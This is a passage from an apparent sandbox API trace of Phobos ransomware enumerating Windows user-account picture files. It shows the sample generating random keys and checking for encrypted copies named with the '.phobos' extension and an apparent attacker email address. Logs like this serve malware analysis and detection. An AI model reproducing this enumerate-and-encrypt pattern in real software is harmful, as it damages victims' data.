(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile28.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.929] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.929] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile29.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.929] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.929] CloseHandle (hObject=0x138) returned 1 [0145.929] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile29.bmp")) returned 0x20 [0145.929] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile29.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.929] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile29.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.929] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.929] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile30.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.930] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.930] CloseHandle (hObject=0x138) returned 1 [0145.930] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile30.bmp")) returned 0x20 [0145.930] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile30.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.930] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile30.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.930] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.930] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile31.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.930] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.930] CloseHandle (hObject=0x138) returned 1 [0145.930] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile31.bmp")) returned 0x20 [0145.930] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile31.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.931] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile31.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.931] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.931] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile32.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.931] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.931] CloseHandle (hObject=0x138) returned 1 [0145.931] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile32.bmp")) returned 0x20 [0145.931] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile32.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.931] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile32.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.931] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.931] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile33.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.932] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.932] CloseHandle (hObject=0x138) returned 1 [0145.932] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile33.bmp")) returned 0x20 [0145.932] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile33.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.932] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile33.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.932] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.932] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile34.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.932] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.932] CloseHandle (hObject=0x138) returned 1 [0145.932] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile34.bmp")) returned 0x20 [0145.932] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile34.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.932] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile34.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.933] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.933] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile35.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.933] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.933] CloseHandle (hObject=0x138) returned 1 [0145.933] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile35.bmp")) returned 0x20 [0145.933] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile35.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.933] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile35.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.933] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.933] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile36.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.933] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.934] CloseHandle (hObject=0x138) returned 1 [0145.934] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile36.bmp")) returned 0x20 [0145.934] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile36.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.934] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile36.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.934] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.934] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile37.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.934] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.934] CloseHandle (hObject=0x138) returned 1 [0145.934] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile37.bmp")) returned 0x20 [0145.934] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile37.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.934] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile37.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.935] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.935] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile38.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.935] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.935] CloseHandle (hObject=0x138) returned 1 [0145.935] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile38.bmp")) returned 0x20 [0145.935] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile38.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.935] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile38.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.935] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.935] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile39.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.935] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.935] CloseHandle (hObject=0x138) returned 1 [0145.935] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile39.bmp")) returned 0x20 [0145.936] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile39.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.936] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile39.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.936] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.936] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile40.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.936] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.936] CloseHandle (hObject=0x138) returned 1 [0145.936] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile40.bmp")) returned 0x20 [0145.936] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile40.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.936] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile40.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.936] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.936] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile41.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.937] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.937] CloseHandle (hObject=0x138) returned 1 [0145.937] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile41.bmp")) returned 0x20 [0145.937] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile41.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.937] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile41.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.937] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.937] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile42.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.937] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.937] CloseHandle (hObject=0x138) returned 1 [0145.937] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile42.bmp")) returned 0x20 [0145.937] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile42.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.937] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile42.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.938] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.938] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile43.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.938] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.938] CloseHandle (hObject=0x138) returned 1 [0145.938] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile43.bmp")) returned 0x20 [0145.938] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile43.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.938] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile43.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.938] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.938] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile44.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.938] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.938] CloseHandle (hObject=0x138) returned 1 [0145.939] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile44.bmp")) returned 0x20 [0145.939] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile44.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.939] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile44.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.939] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.939] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.939] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.939] CloseHandle (hObject=0x138) returned 1 [0145.939] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\programdata\\microsoft\\user account 